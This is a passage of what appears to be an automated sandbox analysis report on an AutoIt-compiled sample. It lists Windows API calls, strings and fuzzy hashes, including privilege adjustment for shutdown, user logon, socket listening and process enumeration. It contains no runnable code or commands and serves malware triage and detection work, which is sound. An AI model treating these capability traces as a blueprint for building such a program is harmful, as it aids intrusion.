                            • FindClose.KERNEL32(00000000), ref: 00423C01
                            • FindClose.KERNEL32(00000000), ref: 00423C0A
                            Strings
                            Similarity
                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                            • String ID: \*.*
                            • API String ID: 2649000838-1173974218
                            • Opcode ID: 162258de7187f8bc99a30acc20ffdf28c1b32d363a0fa555c77a524ba14b5027
                            • Instruction ID: dda62705b1a3b820272c63a5e9192ad5e424e2d9b28e034ce9836a13584481a8
                            • Opcode Fuzzy Hash: 162258de7187f8bc99a30acc20ffdf28c1b32d363a0fa555c77a524ba14b5027
                            • Instruction Fuzzy Hash: EC31A1310083959BC201EF24D891DAFBBB8BE95315F804D2EF8D5C6192EB259E09CB5B
                            APIs
                              • Part of subcall function 004187E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0041882B
                              • Part of subcall function 004187E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00418858
                              • Part of subcall function 004187E1: GetLastError.KERNEL32 ref: 00418865
                            • ExitWindowsEx.USER32(?,00000000), ref: 004251F9
                            Strings
                            Similarity
                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                            • String ID: $@$SeShutdownPrivilege
                            • API String ID: 2234035333-194228
                            • Opcode ID: ee244e3b4cc05804fdcd9ea8ccecd108f66197596311f8b378c31905cbad343a
                            • Instruction ID: 201cbc8fffd34e6c0922598cb9b205a4e2a2942e2fd65c5a1285ee2a3ba6640e
                            • Opcode Fuzzy Hash: ee244e3b4cc05804fdcd9ea8ccecd108f66197596311f8b378c31905cbad343a
                            • Instruction Fuzzy Hash: B7014C35791631BBE7282364BC4AFB7B258AB05340FA008B7F903E21C2DE795C0189BD
                            APIs
                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004362DC
                            • WSAGetLastError.WSOCK32(00000000), ref: 004362EB
                            • bind.WSOCK32(00000000,?,00000010), ref: 00436307
                            • listen.WSOCK32(00000000,00000005), ref: 00436316
                            • WSAGetLastError.WSOCK32(00000000), ref: 00436330
                            • closesocket.WSOCK32(00000000,00000000), ref: 00436344
                            Similarity
                            • API ID: ErrorLast$bindclosesocketlistensocket
                            • String ID:
                            • API String ID: 1279440585-0
                            • Opcode ID: a06ad87296538066bc68b654dd8d62f56ff6169989fa13d579eab65be0d77934
                            • Instruction ID: 29cd39c05c324f77110ad227200022e8818a47d6fb249c1a046064745a7bb93c
                            • Opcode Fuzzy Hash: a06ad87296538066bc68b654dd8d62f56ff6169989fa13d579eab65be0d77934
                            • Instruction Fuzzy Hash: 3721D035600201AFCB10EF64C849F6EB7A9EF49720F16816EEC16EB391CB74AC05CB65
                            APIs
                              • Part of subcall function 003E0DB6: std::exception::exception.LIBCMT ref: 003E0DEC
                              • Part of subcall function 003E0DB6: __CxxThrowException@8.LIBCMT ref: 003E0E01
                            • _memmove.LIBCMT ref: 00410258
                            • _memmove.LIBCMT ref: 0041036D
                            • _memmove.LIBCMT ref: 00410414
                            Similarity
                            • API ID: _memmove$Exception@8Throwstd::exception::exception
                            • String ID:
                            • API String ID: 1300846289-0
                            • Opcode ID: 726371fd52dc8a4c35a573412e9583fcbea1914d78a227720a96ecb729a1dd94
                            • Instruction ID: c0b294884889f3b8f4a4df0d2d1b1b3ed860732ccb304928a0a85488e0673f49
                            • Opcode Fuzzy Hash: 726371fd52dc8a4c35a573412e9583fcbea1914d78a227720a96ecb729a1dd94
                            • Instruction Fuzzy Hash: 9502CF71A00219EBCF05DF65D981AAE7BB5EF44300F14806AE80ADF391EB75DE90CB95
                            APIs
                              • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 003C19FA
                            • GetSysColor.USER32(0000000F,?,?), ref: 003C1A4E
                            • SetBkColor.GDI32(?,00000000), ref: 003C1A61
                              • Part of subcall function 003C1290: DefDlgProcW.USER32(?,00000020,?), ref: 003C12D8
                            Similarity
                            • API ID: ColorProc$LongWindow
                            • String ID:
                            • API String ID: 3744519093-0
                            • Opcode ID: b3d5a8eaa5e68bd530d99800805157d323d54c917cde82368890072c6100e761
                            • Instruction ID: 2e12ffc37e8ccb8b1e6ac187186c321b294f7bd5026ec19d4e2e9d3f18e3129b
                            • Opcode Fuzzy Hash: b3d5a8eaa5e68bd530d99800805157d323d54c917cde82368890072c6100e761
                            • Instruction Fuzzy Hash: 66A187B4102548BAEA2BAB298C44F7F655CDF43385F16011EF603D6593CB24DD01B7BA
                            APIs
                              • Part of subcall function 00437D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00437DB6
                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0043679E
                            • WSAGetLastError.WSOCK32(00000000), ref: 004367C7
                            • bind.WSOCK32(00000000,?,00000010), ref: 00436800
                            • WSAGetLastError.WSOCK32(00000000), ref: 0043680D
                            • closesocket.WSOCK32(00000000,00000000), ref: 00436821
                            Similarity
                            • API ID: ErrorLast$bindclosesocketinet_addrsocket
                            • String ID:
                            • API String ID: 99427753-0
                            • Opcode ID: d713c67117209a93eea135df75cb535a6ddfc7e205a8a3732604dc68a762e152
                            • Instruction ID: b3a81c7828794ad2c82e526301919c5b564fdcba8f03cca6e1c2f542a035ef74
                            • Opcode Fuzzy Hash: d713c67117209a93eea135df75cb535a6ddfc7e205a8a3732604dc68a762e152
                            • Instruction Fuzzy Hash: FD41C275A00210AFDB11BF248C8AF6E77E8AB49714F45846EF91AEF3C2CA749D018795
                            APIs
                            Similarity
                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                            • String ID:
                            • API String ID: 292994002-0
                            • Opcode ID: 914d9c28c51e151c01eab7845c9cba07681f7528dd1576dfa37b298c45326310
                            • Instruction ID: ad3893cedc84da42f9f1020659b0605514b295b56a3d40b69ba0af4ac81d1f74
                            • Opcode Fuzzy Hash: 914d9c28c51e151c01eab7845c9cba07681f7528dd1576dfa37b298c45326310
                            • Instruction Fuzzy Hash: 101186317005116FFB215F269C44B5FBB99EF457A1B41443AFC45D7242CB78DD028699
                            APIs
                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004180C0
                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004180CA
                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004180D9
                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004180E0
                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004180F6
                            Similarity
                            • API ID: HeapInformationToken$AllocErrorLastProcess
                            • String ID:
                            • API String ID: 44706859-0
                            • Opcode ID: a095c9992b7d6eaf5660ae5deb6ea869aa2de7c8a825112fd9e79de243267c56
                            • Instruction ID: b2384ed3528d2471e0960ca80f51c74fb41d68a398d7f561938aa4eaa58ae7c8
                            • Opcode Fuzzy Hash: a095c9992b7d6eaf5660ae5deb6ea869aa2de7c8a825112fd9e79de243267c56
                            • Instruction Fuzzy Hash: 30F06235240214BFEB200FA5EC8DEA73BACEF8A755B00003AF945D6250CB659C45DA64
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 0042C432
                            • CoCreateInstance.OLE32(00452D6C,00000000,00000001,00452BDC,?), ref: 0042C44A
                              • Part of subcall function 003C7DE1: _memmove.LIBCMT ref: 003C7E22
                            • CoUninitialize.OLE32 ref: 0042C6B7
                            Strings
                            Similarity
                            • API ID: CreateInitializeInstanceUninitialize_memmove
                            • String ID: .lnk
                            • API String ID: 2683427295-24824748
                            • Opcode ID: 2bd777242de29a98972782e58d45867e98a9419b252aa314679241cd3d5b9496
                            • Instruction ID: 58a4bdc1fccc0f208440ea2257a1047d8957dcf2a9c15cbbf27942c777d72dbc
                            • Opcode Fuzzy Hash: 2bd777242de29a98972782e58d45867e98a9419b252aa314679241cd3d5b9496
                            • Instruction Fuzzy Hash: CEA14B72104205AFD301EF64C885EABB7E8EF89354F00496DF555CB192DB71EE49CB52
                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 003C4B45
                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo,?,003C4AD0), ref: 003C4B57
                            Strings
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: GetNativeSystemInfo$kernel32.dll
                            • API String ID: 2574300362-192647395
                            • Opcode ID: 85078c74e7855794603d4fa83342297917120f5915deb579725a3593f08702f7
                            • Instruction ID: 5102912bd5c2c3d542805588bfd6fa89cf9f3501ff1ce78a93538375fb810ab1
                            • Opcode Fuzzy Hash: 85078c74e7855794603d4fa83342297917120f5915deb579725a3593f08702f7
                            • Instruction Fuzzy Hash: 75D01274A10713CFDB209F31D828F4676E4AF06391B21883E94C5D6550D674EC84C758
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0043EE3D
                            • Process32FirstW.KERNEL32(00000000,?), ref: 0043EE4B
                              • Part of subcall function 003C7DE1: _memmove.LIBCMT ref: 003C7E22
                            • Process32NextW.KERNEL32(00000000,?), ref: 0043EF0B
                            • CloseHandle.KERNEL32(00000000), ref: 0043EF1A
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                            • String ID:
                            • API String ID: 2576544623-0
                            • Opcode ID: e7de3362f2db4dda5829f1656ab3b37f8f7b5c964ef14988d56b6f4f178bd31a
                            • Instruction ID: 9d074a24f9341f7d98fb052435443efbd7da82a792e2a873b71e5ffc79bd10c0
                            • Opcode Fuzzy Hash: e7de3362f2db4dda5829f1656ab3b37f8f7b5c964ef14988d56b6f4f178bd31a
                            • Instruction Fuzzy Hash: 8E516D71504315ABD311EF25C885F6BB7E8EF98710F10482DF995DB2A1EB70AD08CB96
                            APIs
                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0041E628
                            Strings
                            Similarity
                            • API ID: lstrlen
                            • String ID: ($|
                            • API String ID: 1659193697-1631851259
                            • Opcode ID: c6f5e33efa34a7aecd8df87be5d86ceaca484990b0f0ada1f243ff908051be24
                            • Instruction ID: 01ed6970f5b66aca7dd518d42ee1363466e92dab96e516ccc771df9d1c318420
                            • Opcode Fuzzy Hash: c6f5e33efa34a7aecd8df87be5d86ceaca484990b0f0ada1f243ff908051be24
                            • Instruction Fuzzy Hash: DE322679A007059FD728CF1AC4819AAB7F0FF48310B55C56EE89ADB3A1D774E981CB44
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0042B343
                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0042B39D
                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0042B3EA
                            Similarity
                            • API ID: ErrorMode$DiskFreeSpace
                            • String ID:
                            • API String ID: 1682464887-0
                            • Opcode ID: 6d7aca003c82af84b199cb0271ffefb7037f2fb4af05057fe8a7dc2e77be6ff6
                            • Instruction ID: b57f6e9c5fad8487171e94cc93ee80c98ef5ee0c678bf6e32243c6e8b677454b
                            • Opcode Fuzzy Hash: 6d7aca003c82af84b199cb0271ffefb7037f2fb4af05057fe8a7dc2e77be6ff6
                            • Instruction Fuzzy Hash: 2F216D35A00118EFCB00DF95D884AAEBBB8FF49314F0580AAE805EB251CB319D55CB54
                            APIs
                              • Part of subcall function 003E0DB6: std::exception::exception.LIBCMT ref: 003E0DEC
                              • Part of subcall function 003E0DB6: __CxxThrowException@8.LIBCMT ref: 003E0E01
                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0041882B
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00418858
                            • GetLastError.KERNEL32 ref: 00418865
                            Similarity
                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                            • String ID:
                            • API String ID: 1922334811-0
                            • Opcode ID: fa42521dad1b99043b08c6e16703e7c966df7d3831b5e0d8d23583cd54629f71
                            • Instruction ID: 41f85a7190fd95d171f03e2628f455f00e947b31b5cab16889d8c64083059547
                            • Opcode Fuzzy Hash: fa42521dad1b99043b08c6e16703e7c966df7d3831b5e0d8d23583cd54629f71
                            • Instruction Fuzzy Hash: 3B118FB2414205AFE718EFA4DC86D6BB7F8EB45710B20852EF45597241EB74BC818B64
                            APIs
                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00418774
                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0041878B
                            • FreeSid.ADVAPI32(?), ref: 0041879B
                            Similarity
                            • API ID: AllocateCheckFreeInitializeMembershipToken
                            • String ID:
                            • API String ID: 3429775523-0
                            • Opcode ID: f11cf77060a22bdb34a33eb336874133b6b195819bc8f8ba3193b9f198870b88
                            • Instruction ID: 0888dad38eef5b663d8b013d76258fb253da82137d4c074c865e7c12ba4be099
                            • Opcode Fuzzy Hash: f11cf77060a22bdb34a33eb336874133b6b195819bc8f8ba3193b9f198870b88
                            • Instruction Fuzzy Hash: EFF04F7991130CBFDF00DFF4DC89AAEB7BCEF09201F104479A501E2181D6756A488B54
                            APIs
                            • __time64.LIBCMT ref: 0042889B
                              • Part of subcall function 003E520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00428F6E,00000000,?,?,?,?,0042911F,00000000,?), ref: 003E5213
                              • Part of subcall function 003E520A: __aulldiv.LIBCMT ref: 003E5233
                            Strings
                            Similarity
                            • API ID: Time$FileSystem__aulldiv__time64
                            • String ID: 0eH
                            • API String ID: 2893107130-3148311234
                            • Opcode ID: e5b24e73684987632aff9c2ef036e77526fbe5bdc80953f18344bf405f313489
                            • Instruction ID: 3643ff2868afba8cffc9854a211169357743f4d1af6da3a1b2a8f7a513ff9982
                            • Opcode Fuzzy Hash: e5b24e73684987632aff9c2ef036e77526fbe5bdc80953f18344bf405f313489
                            • Instruction Fuzzy Hash: 4D21D5326255208BC329CF29E441A56B3E1EFA5311F698E6DD1F5CB2C0CA34B905CB58
                            APIs
                            • FindFirstFileW.KERNEL32(?,?), ref: 0042C6FB
                            • FindClose.KERNEL32(00000000), ref: 0042C72B
                            Similarity
                            • API ID: Find$CloseFileFirst
                            • String ID:
                            • API String ID: 2295610775-0
                            • Opcode ID: 76e470170045882f5431d6061474033b47ca2e0cb3e70b70598f361a72a126dc
                            • Instruction ID: 5a289c3cd77222fc4beb83fe749f6cc79f80523c43575632192d4be583d79891
                            • Opcode Fuzzy Hash: 76e470170045882f5431d6061474033b47ca2e0cb3e70b70598f361a72a126dc
                            • Instruction Fuzzy Hash: FD118E766006009FDB10DF29D889A2AF7E9FF85324F01851EF9A9CB291DB34AC05CB85
                            APIs
                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00439468,?,0044FB84,?), ref: 0042A097
                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00439468,?,0044FB84,?), ref: 0042A0A9
                            Similarity
                            • API ID: ErrorFormatLastMessage
                            • String ID:
                            • API String ID: 3479602957-0
                            • Opcode ID: 664d1cfbe4b704d5b19378af50835d8344472ce5cfe4080fc1a2ed5ebbc834bc
                            • Instruction ID: dfd027775a3eb5a1ac6dcec40ffa619d82c8665bf6025698eaf522d74bc4dcde
                            • Opcode Fuzzy Hash: 664d1cfbe4b704d5b19378af50835d8344472ce5cfe4080fc1a2ed5ebbc834bc
                            • Instruction Fuzzy Hash: 76F0E23520422DABDB219FA4DC48FEA736CBF09361F008266FD09D6181C6709904CBE1
                            APIs
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00418309), ref: 004181E0
                            • CloseHandle.KERNEL32(?), ref: 004181F2
                            Similarity
                            • API ID: AdjustCloseHandlePrivilegesToken
                            • String ID:
                            • API String ID: 81990902-0
                            • Opcode ID: dcee959e62be2933b356a643c2cf6b74ae4247558c40862f4f926d3435eaa895
                            • Instruction ID: 2609a843bb446d4e872b20c2ec0d9670e005b3bab0115f6b668184c78eb01b5c
                            • Opcode Fuzzy Hash: dcee959e62be2933b356a643c2cf6b74ae4247558c40862f4f926d3435eaa895
                            • Instruction Fuzzy Hash: 92E0EC76010A20AFE7262B61EC09D777BEAEF44310714893DF8A684470DB62ACD1DB14
                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32 ref: 003EA15A
                            • UnhandledExceptionFilter.KERNEL32(?), ref: 003EA163
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: 77962d20c8b6ced94930208afe6334443e639ec9fdd71e3062054dc17f8ef0f3
                            • Instruction ID: 1aeab84b04b5fd839ea3c868517153fc16cdcb227ff799a0a3a830f765568ef9
                            • Opcode Fuzzy Hash: 77962d20c8b6ced94930208afe6334443e639ec9fdd71e3062054dc17f8ef0f3
                            • Instruction Fuzzy Hash: 66B09235054208ABCA002F91EC09F883F68EB46AA2F404030FA0D84C60CB6254548A99
                            APIs
                            • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00424C76
                            Similarity
                            • API ID: mouse_event
                            APIs
                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00418389), ref: 004187D1
                            Similarity
                            • API ID: LogonUser
                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32 ref: 003EA12A
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            APIs
                            • DeleteObject.GDI32(00000000), ref: 0043785B
                            • DeleteObject.GDI32(00000000), ref: 0043786D
                            • DestroyWindow.USER32 ref: 0043787B
                            • GetDesktopWindow.USER32 ref: 00437895
                            • GetWindowRect.USER32(00000000), ref: 0043789C
                            • SetRect.USER32 ref: 004379DD
                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 004379ED
                            • CreateWindowExW.USER32 ref: 00437A35
                            • GetClientRect.USER32(00000000,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00437A41
                            • CreateWindowExW.USER32 ref: 00437A7B
                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00437A9D
                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00437AB0
                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00437ABB
                            • GlobalLock.KERNEL32(00000000), ref: 00437AC4
                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000), ref: 00437AD3
                            • GlobalUnlock.KERNEL32(00000000), ref: 00437ADC
                            • CloseHandle.KERNEL32(00000000), ref: 00437AE3
                            • GlobalFree.KERNEL32(00000000), ref: 00437AEE
                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000), ref: 00437B00
                            • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00452CAC,00000000), ref: 00437B16
                            • GlobalFree.KERNEL32(00000000), ref: 00437B26
                            • CopyImage.USER32 ref: 00437B4C
                            • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00437B6B
                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020), ref: 00437B8D
                            • ShowWindow.USER32(00000004), ref: 00437D7A
                            Similarity
                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                            • String ID: $AutoIt v3$DISPLAY$static
                            APIs
                            • CharUpperBuffW.USER32(?,?), ref: 00443627
                            • IsWindowVisible.USER32(?), ref: 0044364B
                            Similarity
                            • API ID: BuffCharUpperVisibleWindow
                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                            APIs
                            • SetTextColor.GDI32(?,00000000), ref: 0044A630
                            • GetSysColorBrush.USER32 ref: 0044A661
                            • GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,?,?,?,?,?,003FB93A,?,?), ref: 0044A66D
                            • SetBkColor.GDI32(?,000000FF), ref: 0044A687
                            • SelectObject.GDI32(?,00000000), ref: 0044A696
                            • InflateRect.USER32 ref: 0044A6C1
                            • GetSysColor.USER32(00000010,?,?,?,?,?,?,?,?,?,?,?,?,003FB93A,?,?), ref: 0044A6C9
                            • CreateSolidBrush.GDI32(00000000), ref: 0044A6D0
                            • FrameRect.USER32 ref: 0044A6DF
                            • DeleteObject.GDI32(00000000), ref: 0044A6E6
                            • InflateRect.USER32 ref: 0044A731
                            • FillRect.USER32 ref: 0044A763
                            • GetWindowLongW.USER32(?,000000F0), ref: 0044A78E
                              • Part of subcall function 0044A8CA: GetSysColor.USER32(00000012,00000000,?,?,?,?,?,?,?,?,?,0044A5FA,?,?,00000000,?), ref: 0044A903
                              • Part of subcall function 0044A8CA: SetTextColor.GDI32(?,?), ref: 0044A907
                              • Part of subcall function 0044A8CA: GetSysColorBrush.USER32 ref: 0044A91D
                              • Part of subcall function 0044A8CA: GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,0044A5FA,?,?,00000000,?,?), ref: 0044A928
                              • Part of subcall function 0044A8CA: GetSysColor.USER32(00000011,?,?,?,?,?,?,?,0044A5FA,?,?,00000000,?,?), ref: 0044A945
                              • Part of subcall function 0044A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0044A953
                              • Part of subcall function 0044A8CA: SelectObject.GDI32(?,00000000), ref: 0044A964
                              • Part of subcall function 0044A8CA: SetBkColor.GDI32(?,00000000), ref: 0044A96D
                              • Part of subcall function 0044A8CA: SelectObject.GDI32(?,?), ref: 0044A97A
                              • Part of subcall function 0044A8CA: InflateRect.USER32 ref: 0044A999
                              • Part of subcall function 0044A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0044A9B0
                              • Part of subcall function 0044A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0044A9C5
                              • Part of subcall function 0044A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0044A9ED
                            Similarity
                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                            APIs
                            • DestroyWindow.USER32 ref: 003C2CA2
                            • DeleteObject.GDI32(00000000), ref: 003C2CE8
                            • DeleteObject.GDI32(00000000), ref: 003C2CF3
                            • DestroyIcon.USER32(00000000,?,?,?), ref: 003C2CFE
                            • DestroyWindow.USER32 ref: 003C2D09
                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 003FC43B
                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 003FC474
                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 003FC89D
                              • Part of subcall function 003C1B41: InvalidateRect.USER32(?,00000000,00000001), ref: 003C1B9A
                            • SendMessageW.USER32(?,00001053), ref: 003FC8DA
                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 003FC8F1
                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 003FC907
                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 003FC912
                            Similarity
                            • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                            • String ID: 0
                            APIs
                            • DestroyWindow.USER32 ref: 004374DE
                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0043759D
                            • SetRect.USER32 ref: 004375DB
                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 004375ED
                            • CreateWindowExW.USER32 ref: 00437633
                            • GetClientRect.USER32(00000000,?,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 0043763F
                            • CreateWindowExW.USER32 ref: 00437683
                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00437692
                            • GetStockObject.GDI32(00000011), ref: 004376A2
                            • SelectObject.GDI32(00000000,00000000), ref: 004376A6
                            • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004376B6
                            • GetDeviceCaps.GDI32(00000000,0000005A,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?), ref: 004376BF
                            • DeleteDC.GDI32(00000000), ref: 004376C8
                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004376F4
                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 0043770B
                            • CreateWindowExW.USER32 ref: 00437746
                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0043775A
                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 0043776B
                            • CreateWindowExW.USER32 ref: 0043779B
                            • GetStockObject.GDI32(00000011), ref: 004377A6
                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004377B1
                            • ShowWindow.USER32(00000004), ref: 004377BB
                            Similarity
                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0042AD1E
                            • GetDriveTypeW.KERNEL32(?,0044FAC0,?,\\.\,0044F910), ref: 0042ADFB
                            • SetErrorMode.KERNEL32(00000000,0044FAC0,?,\\.\,0044F910), ref: 0042AF59
                            Similarity
                            • API ID: ErrorMode$DriveType
                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                            APIs
                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103), ref: 00449AD2
                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00449B8B
                            • SendMessageW.USER32(?,00001102,00000002,?), ref: 00449BA7
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSend$Window
                            • String ID: 0$`$
                            • API String ID: 2326795674-1801689331
                            • Opcode ID: 226788585847c5f05910d25a9d3870fbf9197e591a34387a4691aa9c0f83c827
                            • Instruction ID: 04e9ccc228d2198ce666c3999694297c6d3533e35954a4973ef0d393954bcb9e
                            • Opcode Fuzzy Hash: 226788585847c5f05910d25a9d3870fbf9197e591a34387a4691aa9c0f83c827
                            • Instruction Fuzzy Hash: 5F02D030104241AFE725CF14C889BABBBE5FF49314F04852EF999D62A1C738DC59EB5A
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: __wcsnicmp
                            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                            • API String ID: 1038674560-86951937
                            • Opcode ID: 8d69dbfb5966c4df5227b934bf68d5a014124a3aa1f742b28800e59e8005c0ce
                            • Instruction ID: 877433732cc4bc8b422f81741ae76e3957a311955a47b422d7dec1806490188b
                            • Opcode Fuzzy Hash: 8d69dbfb5966c4df5227b934bf68d5a014124a3aa1f742b28800e59e8005c0ce
                            • Instruction Fuzzy Hash: 6E8125B16006196ACB23AA61DC47FBF3B68AF09700F14402AF905EF1D2EB74DE45C7A4
                            APIs
                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00448AC1
                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00448AD2
                            • CharNextW.USER32(0000014E), ref: 00448B01
                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00448B42
                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00448B58
                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00448B69
                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00448B86
                            • SetWindowTextW.USER32(?,0000014E,?,?,?,?,?), ref: 00448BD8
